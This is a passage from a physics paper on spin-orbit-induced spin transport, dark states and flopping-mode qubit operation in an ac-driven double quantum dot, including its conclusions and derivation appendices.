explained above. Next, we consider the case for an arbitrary amplitude of the OME term. Here, we find a more complex situation. The OME term induces fast spin rotations inside the QDs, which prevents current blockade in situations where, otherwise, the particle would remain stuck in the left dot. This effect is most clearly seen in figure 6 for \(\chi\simeq 1\), where the current is blocked for \(\beta_{\rm SO}=0\) (figure 6(a)) if \(E_{z}\neq\omega\), while for \(\beta_{\rm SO}\neq 0\) (figure 6(b)) a non-zero current can flow. Dark states, on the other hand, can still be found, now extending to all values of \(E_{z}\). Interestingly, the spin projection of the steady state is highly polarized, depending on whether \(0<E_{z}<\omega\), for which the particle remains in the left QD with spin down, or \(\omega<E_{z}<2\omega\) so that the final spin projection is inverted. It is also worth mentioning that the DS obtained far from the resonance \(E_{z}\neq\omega\) are highly pure with \(\Tr(\rho^{2})\simeq 1\). These DSs could be used to store quantum information inside a QD without the requirement to modify the tunneling from the leads or between dots. Due to the complexity of our system, no analytical results could be obtained for the formation of DSs for \(\beta_{\rm SO}\neq 0\). Nonetheless, we can still gain an understanding of their appearance by employing the Floquet formalism. For a \(T\)-periodic Hamiltonian, the time evolution of the wave function can be written as \(|\Psi_{\alpha}(t)\rangle=e^{-i\varepsilon_{\alpha}t}|\phi_{\alpha}(t)\rangle\), where \(\varepsilon_{\alpha}\) are the quasienergies and \(|\phi_{\alpha}\rangle\) are the Floquet states, obtained by diagonalizing the Floquet Hamiltonian \(\hat{\mathcal{H}}(t)\equiv\hat{H}(t)-i\partial_{t}\). According to the Von Neumann-Wigner theorem [84], crossings between distinct energy levels occur only if the corresponding states belong to different representations of the symmetry group of the system. Quasienergy crossings follow the same behavior, often signaling that the ac drive has reinstated a symmetry of the system by suppressing the relevant terms in the Hamiltonian [51]. At these crossings, the time evolution operator depends exponentially on the difference between the quasienergies. In resonance, the unitary time evolution matrix becomes the identity operator, freezing the long-term dynamics. The quasienergies for \(\beta_{\mathrm{SO}}\neq 0\) have been obtained by means of numerical methods [85], and their crossings perfectly agree with the location of the DS found by evolving the Lindblad master equation (see figure 6(b)). The Floquet quasienergies for \(E_{z}=0.7\omega\) are shown in figure 6(c). The crossing is located at \(\chi\simeq 0.6\), which coincides with the numerical result for the open system. ## 5 Flopping mode qubit operation We next focus on the situation in which the spin motion is confined to one of the dots. Neglecting the OME term for simplicity, the spin dynamics in that case is governed by the interplay between the Zeeman splitting and the TME first discussed in section 2. In this section, we consider this regime as a possible implementation of a solid-state qubit. Let us first consider the case where we have an electric field that is constant in time. We can perform a SWT to obtain an effective Hamiltonian for an isolated spin in one of the dots. This transformation allows us to obtain the dynamics in one energy subspace that is weakly coupled and well separated in energy from another. In this case, we consider the states for each QD as each of the energy subspaces, so the effective Hamiltonian after the SWT is valid provided that we are far from the resonances (both spin-conserving and spin-flip ones), i.e., \(|\delta|\gg\tau_{0},|\delta\pm E_{z}|\gg\tau_{\mathrm{sf}}\). Under these conditions, we obtain an effective Hamiltonian that is second order in the tunneling and contains Figure 6: Current through a DQD as a function of \(\chi\) and \(E_{z}\) for (a) \(\beta_{\mathrm{SO}}=0\), and (b) \(\beta_{\mathrm{SO}}=0.2E_{z}\). Darker colors represent the appearance of DSs. The inset in panel (a) represents a zoom into the DS around \(E_{z}\simeq\omega\), while the dashed black line denotes the analytical prediction in equation (30). The dashed black line in panel (b) represents the DS predicted by the crossing of Floquet quasienergies. (c) Floquet quasienergies for \(E_{z}=0.7\omega\) (dash-doted line, panel (b)), with the energy crossing highlighted with a circle. \(\delta=0\), \(\omega=10\tau=100\Gamma\), \(\epsilon_{\mathrm{ac}}=2\omega\). all contributions due to virtual tunneling to the other dot, given by \[\hat{H}_{\rm eff} = \hat{H}_{\rm eff}^{(0)}+\hat{H}_{\rm eff}^{(2)}, \tag{31}\] \[\hat{H}_{\rm eff}^{(0)} = \frac{\delta}{2}\hat{\tau}_{z}+\frac{E_{z}}{2}\hat{\sigma}_{z},\] (32) \[\hat{H}_{\rm eff}^{(2)} = \frac{\hat{\tau}_{z}}{2}(-\delta^{(2)}+b_{z}^{(2)}\hat{\sigma}_{z }+b_{\perp}^{(2)}\hat{\sigma}_{x}), \tag{33}\] where \[\delta^{(2)} = \frac{2\tau_{0}^{2}}{\delta}+\tau_{\rm sf}^{2}\left(\frac{1}{ \delta+E_{z}}+\frac{1}{\delta-E_{z}}\right), \tag{34a}\] \[b_{z}^{(2)} = \tau_{\rm sf}^{2}\left(\frac{1}{\delta+E_{z}}-\frac{1}{\delta-E_ {z}}\right),\] (34b) \[b_{\perp}^{(2)} = \tau_{0}\tau_{\rm sf}\left(\frac{1}{\delta+E_{z}}-\frac{1}{ \delta-E_{z}}\right). \tag{34c}\] The first term in equation (33) consists of renormalization of the detuning \(\delta\) due to virtual tunneling. Similarly, the second term is a renormalization of \(E_{z}\) which arises from spin-flip tunneling to the right dot and back. The third term is an effective magnetic field in the direction perpendicular to the external field that gives rise to \(E_{z}\). It arises from a combination of spin-conserving and spin-flip tunneling. In this process, the spin virtually tunnels to the adjacent dot, flipping its spin, and then tunnels back to the original dot through the spin-conserving path, producing an effective spin rotation. This is the TME discussed in section 2 and, like the OME, arises from the motion of the particle under the SOC (the inter-dot dynamics, in this case). Note that, in the same manner as the OME, the TME requires \(E_{z}\neq 0\) to break the time-reversal symmetry. The effective magnetic field induced by TME can be used in a similar manner to that of the flopping-mode qubit [65, 67]. However, the qubit cannot be manipulated via detuning alone due to the lack of two-axis control, unless the spin-flip and tunneling amplitudes can be manipulated independently, i.e., unless \(\chi\) can itself be tuned, e.g., by manipulating the overlap between the particle wave functions centered at each dot [66], rapidly enough to avoid dephasing. Nonetheless, for a time-dependent detuning, as discussed here, the TME allows for resonant manipulation of the dot. Let us focus on the case where \(\epsilon_{\rm ac}\ll\omega\). Then, in the rotating frame and after applying the RWA, we obtain an effective spin model for the resonance \(E_{z}=\omega\). Applying the ac gate with a phase \(\phi\) allows two-axis control of the qubit \[\hat{H}_{\rm RWA}=\frac{b_{z}^{(2)}}{2}\hat{\sigma}_{z}-\frac{\tilde{b}_{1, \perp}}{2}\left(\cos\phi\,\hat{\sigma}_{x}+\sin\phi\,\hat{\sigma}_{y}\right), \tag{35}\] where \[\tilde{b}_{1,\perp}=\frac{4\epsilon_{\rm ac}\tau_{0}\tau_{\rm sf}E_{z}}{\delta \left(\delta^{2}-E_{z}^{2}\right)}. \tag{36}\] Otherwise, the frequency of the ac gate can be matched with the renormalized splitting of the two levels of the qubit \(E_{z}+b_{z}^{(2)}\). The correction to \(\tilde{b}_{1,\perp}\) in this case can be given as \[\tilde{b}_{1,\perp}\rightarrow\tilde{b}_{1,\perp}+\frac{2\epsilon_{\rm ac}\tau_{0} \tau_{\rm sf}b_{z}^{(2)}}{\left(\delta^{2}-E_{z}^{2}\right)^{2}}, \tag{37}\] which is small in the context of the previous approximations. In figure 7(a), we show the dynamics of the flopping-mode qubit using the effective Hamiltonian described above. For comparison, we also show the result obtained by integrating the equation of motion of a closed system under the original Hamiltonian given by equation (2). Since both dot energy levels are out of resonance, with \(\delta=\omega/2\), the population of the right dot is small and the particle remains in the left dot. The results obtained show how the effective model correctly reproduces the dynamics of the system. The Rabi oscillation frequency of the effective model is given by \[\nu_{\rm R}=\frac{1}{2\pi}\sqrt{\left(b_{z}^{(2)}\right)^{2}+\left(\tilde{b}_{ 1,\perp}\right)^{2}}. \tag{38}\] We compare the Rabi frequency of the effective RWA Hamiltonian with that obtained from the original Hamiltonian; see figure 7(b). The results agree for \(|\delta-n\omega|\gg\tau\), as expected. It should be noted that this method of manipulation couples the spin with electric fluctuations due to the dependence of \(b_{z}^{(2)}\) and \(b_{\perp}^{(2)}\) on \(\delta\). In purified silicon, where the magnetic noise caused by the atomic nuclei is heavily suppressed, this may be the main source of decoherence for the qubit [86, 87]. In the low ac gate amplitude described here, the flopping-mode qubit lacks a natural sweetspot [88, 89] in which the system Figure 7: (a) Rabi oscillations in a closed system governed by the full Hamiltonian (symbols) given by equation (2). The dynamics given by the RWA Hamiltonian (solid lines) given by equation (35) is plotted for comparison. Rabi frequency is given by \(\nu_{\rm R}\), shown in the figure. The parameters used are \(\delta=\omega/2\) and \(\tau=0.1\omega\). (b) Rabi frequency as a function of detuning for different total tunneling rates. The results are obtained with the full Hamiltonian (symbols) and the effective RWA Hamiltonian (solid lines). The total tunneling rate is \(\tau=0.05\omega\) (yellow, triangles), \(\tau=0.1\omega\) (orange, squares), and \(\tau=0.2\omega\) (brown, pentagons). Other parameters, common for both panels, are \(\epsilon_{\rm ac}=0.2\omega\), \(E_{z}=\omega\), \(\chi=0.2\), and \(\beta_{\rm SO}=0\). is insensitive to electric noise to first order in the coupling to the bath. In particular, electric noise that enters through \(b_{z}^{(2)}\) could only be efficiently suppressed at \(\delta=0\), where the first derivative with respect to \(\delta\), i.e., the noise susceptibility, vanishes. However, at this value, the qubit cannot be operated as the direct spin-conserving transition is resonant. However, the perpendicular component of the effective magnetic field of equation (36) can be made insensitive to noise to first order at \(\delta=\pm E_{z}/\sqrt{3}\) which can improve qubit operation. This dynamical sweetspot [57, 90] is observed as a minimum of the Rabi frequency at \(\delta\simeq 0.58\omega\) in figure 7(b). In B we give expressions for the TME at arbitrary ac detuning amplitudes. Unlike the simple limit shown in equation (36), these expressions are quite complex, highlighting the fact that the effective magnetic field arises from second-order virtual tunneling involving two PAT processes. In the arbitrary-amplitude limit, as given in B, we can achieve a fine degree of spin manipulation. Furthermore, we also obtain dynamical sweetspots for large ac gate amplitudes. ## 6 Conclusions We have studied the effect of SOC on spin transport in a periodically driven DQD. Due to the presence of a spin-flip tunneling path, a highly spin-polarized current can be achieved by tuning the onsite energy difference between the dots. In this direction, we propose several mechanisms to obtain on-demand highly polarized currents in both directions with fully electric control, allowing fast switching of the polarization under experimental conditions. Furthermore, the combination of the orbital dynamics inside the dots and the ac voltage results in the appearance of an effective magnetic field, powering the electric dipole spin resonances in the dots. In transport, the effect of this field can be most clearly observed in the appearance of characteristic avoided crossings of the tunneling resonances near the EDSR condition \(E_{z}\simeq n\omega\). Tunneling under this condition results in striking novel phenomena, such as spin-dependent tunneling amplitudes due to the constructive self-interference of the sidebands coming from the electric and (effective) magnetic fields. Notably, both of these processes arise from the same ac voltage, with the electric field being the direct result of this voltage and the magnetic field effectively incorporating the dynamics of the excited states of the potential. We also investigate the appearance of new dark states when the system is driven under the EDSR condition, resulting from the interference between photo-assisted spin-conserving and spin-flip processes with different numbers of photons involved. Without a Zeeman splitting, time-reversal symmetry protects against destructive interference between these two processes. However, in the presence of a magnetic field, together with an ac voltage, these two paths can interfere and create dark states. These states exhibit a characteristic even-odd effect, appearing only for odd sideband transitions. Moreover, since the current drop is very sharp, its location can be used to characterize the SOC present in the system. These dark states could be useful for quantum information storage, as they are both highly pure and spin-polarized. Finally, we study the viability of flopping-mode qubit operations when the particle is localized in one of the dots. We provide expressions for the effective magnetic field arising from the interdot motion of the particle under SOC for arbitrary ac-gate amplitudes and particularize the experimentally (more easily) accessible case of small gate amplitudes. In this situation, we identify a dynamical sweetspot induced by the ac voltage, where the Rabi frequency is insensitive to charge noise to first order in detuning. This point of operation may be important for novel solid-state quantum computing platforms, such as isotopically purified silicon, where decoherence due to the nuclear magnetic field can be suppressed, and electric noise may be the most relevant source of decoherence. G.P. and D.F.F. are supported by Spain's MINECO through Grant No. PID2020-117787GB-I00 and by the CSIC Research Platform PTI-001. D.F.F. acknowledges support from FPU Program No. FPU20/04762. J.P.C. acknowledges DFG funding through project B04 of SFB 1277 Emerging Relativistic Phenomena in Condensed Matter. D. F. F. and J. P. C. have contributed equally to this work. ## Appendix A Effective model In this section, we briefly discuss the origin of the OME term \(\hat{H}_{1}(t)\) in the Hamiltonian of equation (1_a_). We follow a similar derivation to [69, 91], employing a Schrieffer-Wolff transformation (SWT) to obtain the effective Hamiltonian on the basis employed in the main text. We consider the Hamiltonian for a single particle in a linear DQD (in the x-direction) under both electric and magnetic fields and in the presence of SOC modeled by the spin-orbit vector [92]\(\mathbf{\alpha}=(\alpha_{x},\alpha_{y},0)\) compatible with 2DEGs grown along the [001] direction [93], i.e., the z-direction in our model. We consider an electric field in the x-direction and a Zeeman splitting \(E_{z}\) in the direction normal to the QD plane (in the z-direction). All this together yields the Hamiltonian \[\hat{H}\left(x,t\right)=\hat{H}_{k}+V\left(x\right)+\hat{H}_{e} \left(x,t\right)+\hat{H}_{z}+\hat{H}_{\mathrm{SO}}, \tag{16}\] \[\hat{H}_{k}=k^{2}/2m,\] (17) \[\hat{H}_{e}\left(x,t\right)=exE\left(t\right),\] (18) \[\hat{H}_{z}=E_{z}\hat{\sigma}_{z}/2,\] (19) \[\hat{H}_{\mathrm{SO}}=\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}k. \tag{20}\] The scalar potential \(V\left(x\right)\) for the DQD exhibits two minima at \(\pm\ell\), near which the potential can be chosen as harmonic \(V_{\mathrm{osc}}\left(x\right)=\left(1/2\right)m\omega_{0}^{2}x^{2}\). In the tight-binding approximation, we first evaluate the local Hamiltonians in each dot in the eigenfunctions of the individual harmonic potentials \[|\psi_{\eta,\nu,\sigma}\rangle=|\eta,\nu\rangle|\sigma\rangle, \tag{21}\] with \(\nu\in\mathbb{N}\) labeling the eigenstates of the harmonic potential and \(\sigma\in\{\uparrow,\downarrow\}\) the spin projection along the z-axis. The orbital part \(|\eta,\nu\rangle\) of these eigenfunctions can be obtained by diagonalizing the Hamiltonian \(\hat{H}_{k}+V_{\rm osc}\left(x-\eta\ell\right)\), with \(\eta=\pm\) corresponding to the left and right dots, as appropriate, and corresponds to a Fock-Darwin function with shifted centers. Following this, around \(\eta\ell\) we can write the terms of the Hamiltonian as \[\hat{H}_{k}+V_{\rm osc}\left(x-\eta\ell\right)=\omega_{0}\left( \hat{a}^{\dagger}\hat{a}+1\right), \tag{11}\] \[\hat{H}_{e}\left(\eta\ell,t\right)=el_{0}E\left(t\right)\left(\hat {a}^{\dagger}+\hat{a}\right)+e\eta E\left(t\right)\ell,\] (12) \[\hat{H}_{\rm SO}=\frac{i}{2l_{0}}\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \left(\hat{a}^{\dagger}-\hat{a}\right), \tag{13}\] with \(\hat{a}^{\dagger},\hat{a}\) the Fock operators of the oscillator and the Zeeman term unchanged. Moreover, we employ the characteristic oscillator length \(l_{0}=\sqrt{\omega_{0}/2m}\). We can separate this Hamiltonian into a part that is static in the orbital dynamics \[\hat{H}_{\eta}^{(0)}=\omega_{0}\left(\hat{a}^{\dagger}\hat{a}+1\right)+eE \left(t\right)\eta\ell+\left(E_{z}/2\right)\hat{\sigma}_{z}, \tag{14}\] and a dynamic part \[\hat{H}_{\eta}^{(1)}=el_{0}E\left(t\right)\left(\hat{a}^{\dagger}+\hat{a} \right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}\left(\hat{a}^{ \dagger}-\hat{a}\right). \tag{15}\] When projected into the ground state, the first part reduces to the usual description of single-state QDs. However, if we project the second part as well, we will obtain an effective Hamiltonian that incorporates the action of the SOC into the ground state. We do this by first performing a SWT \(\hat{H}_{\eta}^{\prime}\left(t\right)=e^{\hat{\Upsilon}}\hat{H}_{\eta}\left(t \right)e^{-\hat{\Upsilon}}\). We further consider the adiabatic approximation with respect to the electric field, valid provided that the driving frequency is much lower than the oscillator frequency, i.e., \(\omega\ll\omega_{0}\). Then the anti-Hermitian operator \(\hat{\Upsilon}\) is given by \[\left[\hat{H}_{\eta}^{(0)},\hat{\Upsilon}\right]=\hat{H}_{\eta}^{(1)}, \tag{16}\] resulting in \[\hat{\Upsilon}=\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right)\hat{a}^{\dagger}- \left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right)\hat{a}, \tag{17}\] where \[f =el_{0}E_{\eta}\left(t\right)/\omega_{0}, \tag{18}\] \[d_{x} =\frac{1}{2l_{0}}\frac{i\omega_{0}\alpha_{x}+\alpha_{y}E_{z}}{ \omega_{0}^{2}-E_{z}^{2}},\] (19) \[d_{y} =\frac{1}{2l_{0}}\frac{i\omega_{0}\alpha_{y}-\alpha_{x}E_{z}}{ \omega_{0}^{2}-E_{z}^{2}},\] (20) \[d_{z} =0. \tag{21}\] The effective action of the SOC term in the ground state is described by the Hamiltonian \[\hat{H}_{\eta}^{(2)}=\frac{1}{2}\left[\hat{\Upsilon},\hat{H}_{\eta}^{(1)}\right] =\frac{1}{2}\left\{\left[\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}} \right),\left(el_{0}E\left(t\right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{ \mathbf{\sigma}}\right)\right]\hat{a}^{\dagger}\hat{a}^{\dagger}\right.\] \[\quad-\left[\left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right), \left(el_{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{ \sigma}}\right)\right]\hat{a}\hat{a}\] \[\quad+\left[\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right),\left(el _{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \right)\right]\hat{a}^{\dagger}\hat{a}\] \[\quad+\left(el_{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha} \cdot\hat{\mathbf{\sigma}}\right)\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right)\] \[\quad+\left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right)\left(el _{0}E\left(t\right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \right)\right\}. \tag{22}\] The two-pair excitation processes \(\left(\propto\hat{a}\hat{a},\hat{a}^{\dagger}\hat{a}^{\dagger}\right)\) connect states that are separated in energy by \(2\omega_{0}\) and therefore can be neglected in our effective Hamiltonian approximation, while the terms \(\propto\hat{a}^{\dagger}\hat{a}\) do not contribute to the energy of the ground state. Hence, we find the following \[\hat{H}_{\eta}^{(2)}=\frac{-E_{z}||\mathbf{\alpha}||^{2}}{2l_{0}^{2}\left(\omega_{0 }^{2}-E_{z}^{2}\right)}\hat{\sigma}_{z}+\frac{E_{z}eE(t)}{\omega_{0}^{2}-E_{z} ^{2}}\mathbf{\alpha}^{\perp}\cdot\hat{\mathbf{\sigma}}. \tag{19}\] where \(\mathbf{\alpha}^{\perp}=(\alpha_{y},-\alpha_{x},0)\). The first term shifts the Zeeman splitting to \[\widetilde{E}_{z}=E_{z}\left(1-\frac{||\mathbf{\alpha}||^{2}}{2l_{0}^{2}\left( \omega_{0}^{2}-E_{z}^{2}\right)}\right), \tag{20}\] while the second term is the OME field that we sought. Crucially, it is oriented perpendicular to the direction of the SOC field, i.e., to \(\mathbf{\alpha}\). Note that both terms require \(E_{z}\neq 0\) to break the time-reversal symmetry. Moreover, the constant part of the electric field \(E(t)\) in the second term will rotate the spin quantization axis. However, this rotation is produced around the direction determined by \(\mathbf{\alpha}\). As shown in the following, the spin-flip amplitude is aligned in this direction and is unaffected by this rotation. The Zeeman splitting along the new quantization axis is given by \[\widetilde{E}_{z}\rightarrow\widetilde{E}_{z}\sqrt{1+\frac{e^{2}E_{0}^{2}||\bm {\alpha}||^{4}}{(\omega_{0}^{2}-E_{z}^{2})^{2}}}\approx\widetilde{E}_{z}\left( 1+\frac{e^{2}E_{0}^{2}||\mathbf{\alpha}||^{4}}{2(\omega_{0}^{2}-E_{z}^{2})^{2}} \right), \tag{21}\] with \(E_{0}\) being the constant part of the electric field. This is a next-order effect compared to the shift from \(E_{z}\) to \(\widetilde{E}_{z}\) and can be ignored. The OME term is similarly rotated, but this is also a higher-order effect, and we disregard it as well. Regarding tunneling amplitudes, we consider orthonormal Wannier functions of the ground state of each dot, defined as [66] \[|w_{\eta,\sigma}\rangle=\frac{1}{\sqrt{N}}(|\psi_{\eta,0,\sigma}\rangle+\gamma |\psi_{\bar{\eta},0,\sigma}\rangle), \tag{22}\] where \(N\equiv 1-2\gamma S+\gamma^{2}\), \(\gamma\equiv(1-\sqrt{1-S^{2}})/S\), and \(S\equiv\langle\psi_{L,0,\sigma}|\psi_{R,0,\sigma}\rangle\) is the overlap between the dot wave functions. Regardless of the particularities of \(V(x)\), we can consider a standard real-valued tunneling matrix element \(\tau_{0}\) without loss of generality. The spin-flip tunneling amplitude can be obtained as \[\tau_{\rm sf}=\langle w_{L\sigma}|\hat{H}_{\rm SO}|w_{R\sigma^{\prime}} \rangle=\frac{1-\gamma^{2}}{N}\langle\sigma|\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}| \sigma^{\prime}\rangle\langle L,0|k|R,0\rangle, \tag{23}\] with \(|\eta,0\rangle\) the ground state of the respective harmonic oscillator, as defined above. The general form of the expected value \(\langle L,0|k|R,0\rangle\) can be determined by imposing time-reversal invariance of the spin-orbit Hamiltonian, i.e., \(\mathcal{T}\hat{H}_{\rm SO}\mathcal{T}^{-1}=\hat{H}_{\rm SO}\). In the most general way, the SOC Hamiltonian, written on the basis of \(\{|L\uparrow\rangle,|L\downarrow\rangle,|R\uparrow\rangle,|R\downarrow\rangle\}\), reads as follows \[\hat{H}_{\rm SO}=\left(\begin{array}{cccc}0&0&0&\tau_{\rm sf}\\ 0&0&-\tau_{\rm sf}^{*}&0\\ 0&-\tau_{\rm sf}&0&0\\ \tau_{\rm sf}^{*}&0&0&0\end{array}\right). \tag{24}\] Taking \(\mathbf{\alpha}\) along the y-direction, as considered throughout this work, we recover a term \(\propto\hat{\tau}_{y}\hat{\sigma}_{y}\), which yields a real spin-flip matrix of the form \[\hat{H}_{\mathrm{SO}}=\left(\begin{array}{cccc}0&0&0&\tau_{\mathrm{sf}}\\ 0&0&-\tau_{\mathrm{sf}}&0\\ 0&-\tau_{\mathrm{sf}}&0&0\\ \tau_{\mathrm{sf}}&0&0&0\end{array}\right). \tag{145}\] The fact that the spin-flip tunneling term is \(\propto\hat{\tau}_{y}\) is crucial. Otherwise, the spin-flip and spin-conserving tunneling terms can interfere destructively. Consider, for instance, that the tunneling is of the form \(\propto\hat{\tau}_{x}\hat{\sigma}_{x}\). By performing a \(\pi/2\) rotation around the y-axis, we obtain \[\hat{H}_{\mathrm{T}}=\left(\begin{array}{cccc}0&0&-\tau_{0}+\tau_{\mathrm{ sf}}&0\\ 0&0&0&-\tau_{0}-\tau_{\mathrm{sf}}\\ -\tau_{0}+\tau_{\mathrm{sf}}&0&0&0\\ 0&-\tau_{0}-\tau_{\mathrm{sf}}&0&0\end{array}\right), \tag{146}\] which can exhibit a dark state when \(\tau_{0}=\tau_{\mathrm{sf}}\), i.e., when \(\chi=0.5\). However, if, as here, we have a term \(\propto\hat{\tau}_{y}\hat{\sigma}_{y}\), the rotation yields \[\hat{H}_{\mathrm{T}}=\left(\begin{array}{cccc}0&0&-\tau_{0}-i\tau_{\mathrm{ sf}}&0\\ 0&0&0&-\tau_{0}+i\tau_{\mathrm{sf}}\\ -\tau_{0}+i\tau_{\mathrm{sf}}&0&0&0\\ 0&-\tau_{0}-i\tau_{\mathrm{sf}}&0&0\end{array}\right), \tag{147}\] preventing destructive interference. ## Appendix B TME for arbitrary ac amplitudes In this appendix, we give the expressions for the TME terms in the time-dependent case with arbitrary ac amplitudes. After a time-dependent SWT [94], we obtain an effective Hamiltonian up to second order in the tunnel couplings, given by \[\hat{H}_{\mathrm{eff}}^{(2)}\left(t\right)=\frac{\hat{\tau}_{z}}{2}\{-\delta^{ \left(2\right)}\left(t\right)+b_{z}^{\left(2\right)}\left(t\right)\hat{\sigma }_{z}+[b_{x}^{\left(2\right)}\left(t\right)\hat{\sigma}_{x}+b_{y}^{\left(2 \right)}\left(t\right)\hat{\sigma}_{y}]\}, \tag{148}\] where the time-dependent detuning and Zeeman splittings are given by \[\delta^{\left(2\right)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega} \right)J_{\nu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)\cos[(\mu-\nu )\omega t] \tag{149}\] \[\times \left[\frac{2\tau_{0}^{2}}{\delta-\nu\omega}+\frac{\tau_{\mathrm{ sf}}^{2}}{\delta+E_{z}+\nu\omega}+\frac{\tau_{\mathrm{sf}}^{2}}{\delta-E_{z}+\nu \omega}\right],\] \[b_{z}^{\left(2\right)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega} \right)J_{\nu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)\cos[(\mu-\nu )\omega t]\] (150) \[\times \left[\frac{\tau_{\mathrm{sf}}^{2}}{\delta+E_{z}+\nu\omega}- \frac{\tau_{\mathrm{sf}}^{2}}{\delta-E_{z}+\nu\omega}\right].\] The magnetic field gradient in the perpendicular direction is given by \[b_{x}^{(2)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_ {\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\cos[(\mu-\nu)(\omega t+\phi)] \tag{14}\] \[\times \left[\frac{\tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu\omega}-\frac{ \tau_{0}\tau_{\rm sf}}{\delta-E_{z}-\nu\omega}\right]\] \[b_{y}^{(2)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right) J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\sin[(\mu-\nu)(\omega t+ \phi)]\] (15) \[\times \left(\frac{2\tau_{0}\tau_{\rm sf}}{\delta-\nu\omega}-\frac{ \tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{ \delta-E_{z}-\nu\omega}\right).\] Note that these expressions involve two different photon numbers \(\mu\) and \(\nu\), as they are virtual second-order tunneling processes that involve two photo-assisted transitions [55, 57]. In an \(n-\)photon resonance \(E_{z}\simeq n\omega\), the Hamiltonian in the RWA is given by \[\hat{H}_{n}^{(2)}\left(t\right)=\frac{\hat{\tau}_{z}}{2}\{-\widetilde{\delta} ^{(2)}+(E_{z}+\widetilde{b}_{z}^{(2)}-n\omega)\hat{\sigma}_{z}+\widetilde{b}_ {n,\perp}^{(2)}[\cos(n\phi)\hat{\sigma}_{x}+\sin(n\phi)\hat{\sigma}_{y}]\}, \tag{16}\] where the diagonal terms are given by \[\widetilde{\delta}^{(2)} = \sum_{\nu}J_{\nu}^{2}\left(\frac{\epsilon_{\rm ac}}{\omega} \right)\left[\frac{2\tau_{0}^{2}}{\delta-\nu\omega}+\frac{\tau_{\rm sf}^{2}}{ \delta+E_{z}+\nu\omega}+\frac{\tau_{\rm sf}^{2}}{\delta-E_{z}+\nu\omega} \right], \tag{17}\] \[\widetilde{b}_{z}^{(2)} = \sum_{\nu}J_{\nu}^{2}\left(\frac{\epsilon_{\rm ac}}{\omega} \right)\left(\frac{\tau_{\rm sf}^{2}}{\delta+E_{z}+\nu\omega}-\frac{\tau_{\rm sf }^{2}}{\delta-E_{z}+\nu\omega}\right), \tag{18}\] and the off-diagonal term has an amplitude \[\widetilde{b}_{n,\perp}^{(2)} = \sum_{\nu}J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_ {\nu+n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left(\frac{\tau_{0}\tau_{ \rm sf}}{\delta-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{\delta-E_{z}-\nu \omega}\right) \tag{19}\] \[- \sum_{\nu}J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_ {\nu-n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left(\frac{\tau_{0}\tau_{ \rm sf}}{\delta-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu \omega}\right).\] If figure 1, we compare the Rabi frequency of a flopping-mode qubit obtained with the full Hamiltonian, with the results given by the effective RWA Hamiltonian shown above. To obtain numerical results, we have truncated the summations to \(\nu=-2,-1,\ldots,2\). The agreement between both results is notable, even when working with tunneling rates of \(\tau=0.2\omega\) We also compare the prediction given by the low-amplitude effective Hamiltonian shown in equation (35) of the main text. In the limit of \(\epsilon_{\rm ac}<\omega/2\) all the results coincide. ## Appendix C TME under the spin resonance condition: asymmetry in \(\delta\) To gain insight into the asymmetry in \(\delta\) discussed in section 3.1 of the main text, let us study the TME under spin resonance. That is, we consider the Hamiltonian of equation (24) in a situation where direct tunneling between the two dots is energetically disfavored. This can always be satisfied by lowering \(\tau\). Hence, since in this appendix we are concerned with qualitative understanding of the asymmetry, we do not regard the precise conditions of validity and always assume a value of \(\tau\) that makes the SWT valid. Under this condition, virtual tunneling processes are dominant and we can employ a SWT to obtain an effective Hamiltonian with the leading term being of second order in the tunneling amplitudes, as done above for the flopping-mode operation in section 5 of the main text. We apply these transformations in the frame discussed in section 3.1 leading to equation (24), i.e., after applying equation (16) and equation (13)), and working in the RWA. This is different from the treatment of B, where SWT was applied before RWA. This amounts to neglecting photo-assisted virtual tunneling processes. A complete treatment of the TME in the presence of the OME lies outside of the scope of this work. In this rotating frame, as discussed above, the \(\beta_{\mathrm{SO}}\) term has taken a role analogous to the Zeeman splitting. Applying the transformation yields the following effective spin model for the left dot \[\hat{H}_{\mathrm{eff}}=\frac{1}{2}\left(\widetilde{E}_{z}+\widetilde{b}_{z}^{ (2)}\right)\hat{\sigma}_{z}+\frac{\tilde{b}_{\perp}^{(2)}}{2}\hat{\sigma}_{x}, \tag{17}\] where the effective magnetic field is given by 